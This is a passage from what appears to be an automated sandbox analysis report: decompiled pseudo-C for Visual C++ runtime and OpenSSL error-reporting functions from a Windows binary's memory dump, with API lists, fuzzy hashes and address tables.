                                                                • Part of subcall function 00C6A59B: __fileno.LIBCMT ref: 00C6A60B
                                                                • Part of subcall function 00C6A59B: __lseeki64.LIBCMT ref: 00C6A612
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __fileno__flush__fseeki64_nolock__ftelli64_nolock__lock__lock_file__lseeki64
                                                              • String ID:
                                                              • API String ID: 3130368316-0
                                                              • Opcode ID: 8ea855d46dc593c2373fc978ff74fa9aa1a7bf18de90ad9cb438a2d0c56f7516
                                                              • Instruction ID: 1add296dbf59f7c67f56b94976edeb95d41b4a4ed2f7ba7a7336c10c02e76ce1
                                                              • Opcode Fuzzy Hash: 8ea855d46dc593c2373fc978ff74fa9aa1a7bf18de90ad9cb438a2d0c56f7516
                                                              • Instruction Fuzzy Hash: D4E01A31840209FBDF11BFA4CC02BDD7B71AF04310F208158F4246A1A2C7358621AF82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C79B10, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 82%
                                                              			E00C79B10(void* __edx, void* __esi, void* __eflags) {
				void* _t3;
				void* _t7;
				void* _t10;
				void* _t13;
				intOrPtr _t15;
				intOrPtr _t16;

				_push(8);
				_push(0xcbffe0);
				_t3 = E00C70838(_t7, _t10, __esi);
				_t15 =  *0xcc9f1c; // 0x1
				if(_t15 == 0) {
					E00C6FD40(_t7, _t10, 6);
					 *((intOrPtr*)(_t13 - 4)) = 0;
					_t16 =  *0xcc9f1c; // 0x1
					if(_t16 == 0) {
						E00C793FB(_t7, __edx, _t10, 0, _t16); // executed
						 *0xcc9f1c =  *0xcc9f1c + 1;
					}
					 *((intOrPtr*)(_t13 - 4)) = 0xfffffffe;
					_t3 = E00C79B56();
				}
				return E00C7087D(_t3);
			}









                                                              0x00c79b10
                                                              0x00c79b12
                                                              0x00c79b17
                                                              0x00c79b1e
                                                              0x00c79b24
                                                              0x00c79b28
                                                              0x00c79b2e
                                                              0x00c79b31
                                                              0x00c79b37
                                                              0x00c79b39
                                                              0x00c79b3e
                                                              0x00c79b3e
                                                              0x00c79b44
                                                              0x00c79b4b
                                                              0x00c79b4b
                                                              0x00c79b55

                                                              APIs
                                                              • __lock.LIBCMT ref: 00C79B28
                                                                • Part of subcall function 00C6FD40: __mtinitlocknum.LIBCMT ref: 00C6FD56
                                                                • Part of subcall function 00C6FD40: __amsg_exit.LIBCMT ref: 00C6FD62
                                                                • Part of subcall function 00C6FD40: EnterCriticalSection.KERNEL32(?,?,?,00C70AAD,00000004,00CBFCC8,0000000C,00C69D5A,?,?,00000000,?,?,?,00B91010,00000021), ref: 00C6FD6A
                                                              • __tzset_nolock.LIBCMT ref: 00C79B39
                                                                • Part of subcall function 00C793FB: __lock.LIBCMT ref: 00C7941D
                                                                • Part of subcall function 00C793FB: __get_daylight.LIBCMT ref: 00C79432
                                                                • Part of subcall function 00C793FB: __invoke_watson.LIBCMT ref: 00C79441
                                                                • Part of subcall function 00C793FB: __get_daylight.LIBCMT ref: 00C7944D
                                                                • Part of subcall function 00C793FB: __invoke_watson.LIBCMT ref: 00C7945C
                                                                • Part of subcall function 00C793FB: __get_daylight.LIBCMT ref: 00C79468
                                                                • Part of subcall function 00C793FB: __invoke_watson.LIBCMT ref: 00C79477
                                                                • Part of subcall function 00C793FB: ____lc_codepage_func.LIBCMT ref: 00C7947F
                                                                • Part of subcall function 00C793FB: __getenv_helper_nolock.LIBCMT ref: 00C794A1
                                                                • Part of subcall function 00C793FB: _strlen.LIBCMT ref: 00C794DF
                                                                • Part of subcall function 00C793FB: __malloc_crt.LIBCMT ref: 00C794E6
                                                                • Part of subcall function 00C793FB: _strlen.LIBCMT ref: 00C794FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __get_daylight__invoke_watson$__lock_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock
                                                              • String ID:
                                                              • API String ID: 4157481694-0
                                                              • Opcode ID: 797195cf0bf974d05adfa0ff71292f085d1327d1a0b4f1a4c12807eeac8ee408
                                                              • Instruction ID: a4c00dbcea3f143fd20cb1ceed25828666400493129031125e7b3303395658df
                                                              • Opcode Fuzzy Hash: 797195cf0bf974d05adfa0ff71292f085d1327d1a0b4f1a4c12807eeac8ee408
                                                              • Instruction Fuzzy Hash: 5EE01270484710D7CB31BBF1A816B1CB270EB14B61F60C12DF59CA61D1CA301642EBE6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C6B2A7, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00C6B2A7(int _a4) {

				E00C6B27C(_a4);
				ExitProcess(_a4);
			}



                                                              0x00c6b2af
                                                              0x00c6b2b8

                                                              APIs
                                                              • ___crtCorExitProcess.LIBCMT ref: 00C6B2AF
                                                                • Part of subcall function 00C6B27C: GetModuleHandleW.KERNEL32(mscoree.dll,?,00C6B2B4,?,?,00C6A2CD,000000FF,0000001E,?,00C716F3,?,00000001,?,?,00C6FCCA,00000018), ref: 00C6B286
                                                                • Part of subcall function 00C6B27C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C6B296
                                                              • ExitProcess.KERNEL32 ref: 00C6B2B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                              • String ID:
                                                              • API String ID: 2427264223-0
                                                              • Opcode ID: e23b733e6ef16913970a937fa5eb650b53c707955d1fabde46309890577f5cb9
                                                              • Instruction ID: 4de1cb397a9895b155161a9dcaf0d219151b6c202d36ec967799c4bf53f86ae3
                                                              • Opcode Fuzzy Hash: e23b733e6ef16913970a937fa5eb650b53c707955d1fabde46309890577f5cb9
                                                              • Instruction Fuzzy Hash: 45B09232000108BBCF112F26DC4E94E3FAAEB847A0B204024F80849031DF72AD92EAC8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C6ADA3, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 65%
                                                              			E00C6ADA3(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t21;
				void* _t31;
				intOrPtr _t38;

				_push(0xc);
				_push(0xcbfa40);
				E00C70838(__ebx, __edi, __esi);
				if( *((intOrPtr*)(_t31 + 0xc)) == 0 ||  *((intOrPtr*)(_t31 + 0x10)) == 0) {
					L4:
					_t16 = 0;
				} else {
					_t38 =  *((intOrPtr*)(_t31 + 0x14));
					_t39 = _t38 != 0;
					if(_t38 != 0) {
						E00C6A4BD( *((intOrPtr*)(_t31 + 0x14)));
						 *((intOrPtr*)(_t31 - 4)) = 0;
						_t21 = E00C6AC41(__edx,  *((intOrPtr*)(_t31 + 8)),  *((intOrPtr*)(_t31 + 0xc)),  *((intOrPtr*)(_t31 + 0x10)),  *((intOrPtr*)(_t31 + 0x14))); // executed
						 *((intOrPtr*)(_t31 - 0x1c)) = _t21;
						 *((intOrPtr*)(_t31 - 4)) = 0xfffffffe;
						E00C6AE1B();
						_t16 =  *((intOrPtr*)(_t31 - 0x1c));
					} else {
						 *((intOrPtr*)(E00C6D8C9(_t39))) = 0x16;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00C6FB6E(__edx, __edi, 0);
						goto L4;
					}
				}
				return E00C7087D(_t16);
			}







                                                              0x00c6ada3
                                                              0x00c6ada5
                                                              0x00c6adaa
                                                              0x00c6adb4
                                                              0x00c6addf
                                                              0x00c6addf
                                                              0x00c6adbb
                                                              0x00c6adbd
                                                              0x00c6adc3
                                                              0x00c6adc5
                                                              0x00c6adea
                                                              0x00c6adf0
                                                              0x00c6adff
                                                              0x00c6ae07
                                                              0x00c6ae0a
                                                              0x00c6ae11
                                                              0x00c6ae16
                                                              0x00c6adc7
                                                              0x00c6adcc
                                                              0x00c6add2
                                                              0x00c6add3
                                                              0x00c6add4
                                                              0x00c6add5
                                                              0x00c6add6
                                                              0x00c6add7
                                                              0x00000000
                                                              0x00c6addc
                                                              0x00c6adc5
                                                              0x00c6ade6

                                                              APIs
                                                              • __lock_file.LIBCMT ref: 00C6ADEA
                                                                • Part of subcall function 00C6D8C9: __getptd_noexit.LIBCMT ref: 00C6D8C9
                                                                • Part of subcall function 00C6FB6E: __decode_pointer.LIBCMT ref: 00C6FB79
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __decode_pointer__getptd_noexit__lock_file
                                                              • String ID:
                                                              • API String ID: 3158947991-0
                                                              • Opcode ID: bdd256e1c78e332b8b76208a1962e7ecc15df7e57d070941592025a85c6ff88c
                                                              • Instruction ID: f35df5d524cce5dec4c456ac891954908a10c20f5447d81e10557a9a6c44f3d4
                                                              • Opcode Fuzzy Hash: bdd256e1c78e332b8b76208a1962e7ecc15df7e57d070941592025a85c6ff88c
                                                              • Instruction Fuzzy Hash: D9F04F31D01219EBCF31BFA49C4299E7B60AF04712F108465F82566192D7358A61FFD2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B915D0, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 86%
                                                              			E00B915D0(intOrPtr __ebx, CHAR* __edi, long _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* __esi;
				void* __ebp;
				long _t8;
				char _t9;
				intOrPtr _t11;
				CHAR* _t14;
				intOrPtr _t16;

				_t14 = __edi;
				_t11 = __ebx;
				_t16 = _a8;
				_v8 = _a12;
				_t8 = GetFileAttributesA(__edi); // executed
				if(_t8 != 0xffffffff) {
					_t9 = L00C6A96D(__edi, 0xcbf778); // executed
					if(_t9 == 0) {
						L4:
						_t8 = _a4;
						if(_t8 != 0 && _t8 == 1) {
							_push(_t16);
							_push(_t11);
							return L00B911C0(_v8, _t14);
						}
					} else {
						_t8 = E00B910C0(__ebx, _t9, _t16);
						if(_t8 == 0 || _a4 != 1) {
							goto L4;
						}
					}
				}
				return _t8;
			}











                                                              0x00b915d0
                                                              0x00b915d0
                                                              0x00b915d8
                                                              0x00b915de
                                                              0x00b915e2
                                                              0x00b915eb
                                                              0x00b915f3
                                                              0x00b915fd
                                                              0x00b91611
                                                              0x00b91611
                                                              0x00b91617
                                                              0x00b91622
                                                              0x00b91623
                                                              0x00000000
                                                              0x00b9162b
                                                              0x00b915ff
                                                              0x00b91601
                                                              0x00b91608
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91608
                                                              0x00b915fd
                                                              0x00b91633

                                                              APIs
                                                              • GetFileAttributesA.KERNELBASE ref: 00B915E2
                                                                • Part of subcall function 00B910C0: __fread_nolock.LIBCMT ref: 00B910E1
                                                                • Part of subcall function 00B910C0: __fread_nolock.LIBCMT ref: 00B91125
                                                                • Part of subcall function 00B910C0: __fread_nolock.LIBCMT ref: 00B9114C
                                                                • Part of subcall function 00B910C0: __fread_nolock.LIBCMT ref: 00B91164
                                                                • Part of subcall function 00B910C0: __fread_nolock.LIBCMT ref: 00B91189
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __fread_nolock$AttributesFile
                                                              • String ID:
                                                              • API String ID: 1831139023-0
                                                              • Opcode ID: 9728ec613f73baf52f0605894939a9738bc944ecb2ccf2c0ffa1ef4a866c6676
                                                              • Instruction ID: f3a9c7cc058ec12592fec4ad53fe3d10447db7fac88050f25aa4b318abe637bf
                                                              • Opcode Fuzzy Hash: 9728ec613f73baf52f0605894939a9738bc944ecb2ccf2c0ffa1ef4a866c6676
                                                              • Instruction Fuzzy Hash: 94F0BE35E00302578E20AA3DAE4553BB6D8DE81751F580DB8F894E2250EA31DC18EB73
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA33F0, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00BA33F0(intOrPtr _a4) {
				intOrPtr _t2;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;

				_t2 =  *0xcc1284; // 0xba33f0
				if(_t2 == 0 || _t2 == E00BA33F0) {
					_t3 = _a4;
					if(_a4 > 0) {
						 *0xcc1280 = 0; // executed
						_t4 = E00C6A294(_t6, _t7, _t8, _t3); // executed
						return _t4;
					} else {
						return 0;
					}
				} else {
					goto __eax;
				}
			}








                                                              0x00ba33f0
                                                              0x00ba33f7
                                                              0x00ba3402
                                                              0x00ba3408
                                                              0x00ba340e
                                                              0x00ba3418
                                                              0x00ba3420
                                                              0x00ba340a
                                                              0x00ba340c
                                                              0x00ba340c
                                                              0x00ba3400
                                                              0x00ba3400
                                                              0x00ba3400

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _malloc
                                                              • String ID:
                                                              • API String ID: 1579825452-0
                                                              • Opcode ID: eecff20b155070f91ed61441529cdb0007a715c50be11ef43db138562479acec
                                                              • Instruction ID: 10b216c07768a2472447bd7533025874c9a765baa94924c9b372e3d142124124
                                                              • Opcode Fuzzy Hash: eecff20b155070f91ed61441529cdb0007a715c50be11ef43db138562479acec
                                                              • Instruction Fuzzy Hash: 9DD0A76130C10056E7B18A19E84170A77C8E707F40F4804A4F80CC1250EB38C9059517
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA47A0, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 58%
                                                              			E00BA47A0(long* _a4) {
				signed int _t3;

				_t3 = TlsFree( *_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t3);
			}




                                                              0x00ba47a7
                                                              0x00ba47af
                                                              0x00ba47b3

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Free
                                                              • String ID:
                                                              • API String ID: 3978063606-0
                                                              • Opcode ID: e129044edb422b1657594e40983de1b7f77a4478dd4f2b8b76d00c3967133a60
                                                              • Instruction ID: 3171958e3e89292b649d3048c31775f38f4630ca6b2c3fff8d37cacd69e3d700
                                                              • Opcode Fuzzy Hash: e129044edb422b1657594e40983de1b7f77a4478dd4f2b8b76d00c3967133a60
                                                              • Instruction Fuzzy Hash: A1B092703A4206AB8A148B34C954A2933A1AB85A02B100A58B006CB190CB30D8049A01
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C73EB3, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00C73EB3() {
				void* _t1;

				_t1 = E00C73E41(0); // executed
				return _t1;
			}




                                                              0x00c73eb5
                                                              0x00c73ebb

                                                              APIs
                                                              • __encode_pointer.LIBCMT ref: 00C73EB5
                                                                • Part of subcall function 00C73E41: TlsGetValue.KERNEL32(00000000,?,00C73EBA,00000000,00C79CC0,00CC99C0,00000000,00000314,?,00C713E2,00CC99C0,Microsoft Visual C++ Runtime Library,00012010), ref: 00C73E53
                                                                • Part of subcall function 00C73E41: TlsGetValue.KERNEL32(00000005,?,00C73EBA,00000000,00C79CC0,00CC99C0,00000000,00000314,?,00C713E2,00CC99C0,Microsoft Visual C++ Runtime Library,00012010), ref: 00C73E6A
                                                                • Part of subcall function 00C73E41: RtlEncodePointer.NTDLL(00000000,?,00C73EBA,00000000,00C79CC0,00CC99C0,00000000,00000314,?,00C713E2,00CC99C0,Microsoft Visual C++ Runtime Library,00012010), ref: 00C73EA8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Value$EncodePointer__encode_pointer
                                                              • String ID:
                                                              • API String ID: 2585649348-0
                                                              • Opcode ID: d1141d789f2f235ad7d8d89ca010657446648e495bfbff0b7a12f25c8c72bdcd
                                                              • Instruction ID: ec1106a76dd642a844c49aadeec739ceba216456fe79a3eef8daec60671bd13e
                                                              • Opcode Fuzzy Hash: d1141d789f2f235ad7d8d89ca010657446648e495bfbff0b7a12f25c8c72bdcd
                                                              • Instruction Fuzzy Hash:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 00BA7A30, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 157registryfilewindowCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 94%
                                                              			E00BA7A30(char* _a4, char _a8) {
				signed int _v8;
				short _v10;
				void _v520;
				long _v524;
				void* _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				char* _t46;
				signed int _t50;
				signed int _t51;
				long _t62;
				char* _t63;
				char _t64;
				signed short* _t69;
				char* _t73;
				void* _t76;
				int _t80;
				void* _t81;
				signed int _t82;
				void* _t83;

				E00C6BB10(0x208);
				_t43 =  *0xcc5970; // 0x851ab4dd
				_v8 = _t43 ^ _t82;
				_t81 = GetStdHandle(0xfffffff4);
				if(_t81 == 0 || GetFileType(_t81) == 0) {
					_t63 = _a4;
					_t46 = _t63;
					_t73 =  &(_t46[1]);
					do {
						_t64 =  *_t46;
						_t46 =  &(_t46[1]);
					} while (_t64 != 0);
					_t80 = _t46 - _t73 + 1;
					E00C6C610(_t80 + _t80);
					_t81 = _t83;
					if(_t81 != 0) {
						_t50 = MultiByteToWideChar(0, 0, _t63, _t80, _t81, _t80);
						if(_t50 != 0 || _t80 <= 0) {
							L13:
							_t51 = 0;
							if(_t80 <= 0) {
								L25:
								E00C6C710( &_v520, 0xff, _t81,  &_a8);
								_t74 = 0;
								_v10 = 0;
								if(GetVersion() >= 0x80000000 || E00BA78F0() <= 0) {
									_t74 =  &_v520;
									_t55 = MessageBoxW(0,  &_v520, L"OpenSSL: FATAL", 0x10);
								} else {
									_t81 = RegisterEventSourceW(0, L"OpenSSL");
									if(_t81 != 0) {
										_v524 =  &_v520;
										ReportEventW(_t81, 1, 0, 0, 0, 1, 0,  &_v524, 0);
										_t55 = DeregisterEventSource(_t81);
									}
								}
								goto L30;
							} else {
								goto L14;
							}
							do {
								L14:
								if( *((short*)(_t81 + _t51 * 2)) != 0x25) {
									goto L24;
								}
								_t69 = _t81 + 2 + _t51 * 2;
								while(1) {
									L16:
									_t76 = ( *_t69 & 0x0000ffff) + 0xffffffd6;
									if(_t76 > 0x49) {
										goto L24;
									}
									switch( *((intOrPtr*)(( *(_t76 + 0xba7c20) & 0x000000ff) * 4 +  &M00BA7C08))) {
										case 0:
											_t51 = _t51 + 1;
											_t69 =  &(_t69[1]);
											goto L16;
										case 1:
											__edx = 0x63;
											goto L23;
										case 2:
											__edx = 0x73;
											L23:
											 *((short*)(__esi + 2 + __eax * 2)) = __dx;
											goto L24;
										case 3:
											__ecx = 0x43;
											 *((short*)(__esi + 2 + __eax * 2)) = __cx;
											goto L24;
										case 4:
											__ecx = 0x53;
											 *((short*)(__esi + 2 + __eax * 2)) = __cx;
											goto L24;
										case 5:
											goto L24;
									}
								}
								L24:
								_t51 = _t51 + 1;
							} while (_t51 < _t80);
							goto L25;
						} else {
							do {
								 *((short*)(_t81 + _t50 * 2)) = _a4[_t50];
								_t50 = _t50 + 1;
							} while (_t50 < _t80);
							goto L13;
						}
					}
					_t81 = L"no stack?";
					goto L25;
				} else {
					_t62 = E00C6C7E0( &_v520, 0x200, _a4,  &_a8);
					if(_t62 < 0) {
						_t62 = 0x200;
					}
					_t74 =  &_v520;
					_t55 = WriteFile(_t81,  &_v520, _t62,  &_v524, 0);
					L30:
					return E00C69C26(_t55, _t63, _v8 ^ _t82, _t74, _t80, _t81);
				}
			}

























                                                              0x00ba7a38
                                                              0x00ba7a3d
                                                              0x00ba7a44
                                                              0x00ba7a52
                                                              0x00ba7a56
                                                              0x00ba7aa5
                                                              0x00ba7aa8
                                                              0x00ba7aaa
                                                              0x00ba7ab0
                                                              0x00ba7ab0
                                                              0x00ba7ab2
                                                              0x00ba7ab3
                                                              0x00ba7ab9
                                                              0x00ba7abf
                                                              0x00ba7ac4
                                                              0x00ba7ac8
                                                              0x00ba7adc
                                                              0x00ba7ae4
                                                              0x00ba7b01
                                                              0x00ba7b01
                                                              0x00ba7b05
                                                              0x00ba7b5f
                                                              0x00ba7b70
                                                              0x00ba7b75
                                                              0x00ba7b7a
                                                              0x00ba7b89
                                                              0x00ba7bdf
                                                              0x00ba7be8
                                                              0x00ba7b94
                                                              0x00ba7ba1
                                                              0x00ba7ba5
                                                              0x00ba7bc3
                                                              0x00ba7bc9
                                                              0x00ba7bd0
                                                              0x00ba7bd0
                                                              0x00ba7ba5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba7b07
                                                              0x00ba7b07
                                                              0x00ba7b0c
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba7b0e
                                                              0x00ba7b12
                                                              0x00ba7b12
                                                              0x00ba7b15
                                                              0x00ba7b1b
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba7b24
                                                              0x00000000
                                                              0x00ba7b2b
                                                              0x00ba7b2c
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba7b50
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba7b3d
                                                              0x00ba7b55
                                                              0x00ba7b55
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba7b44
                                                              0x00ba7b49
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba7b31
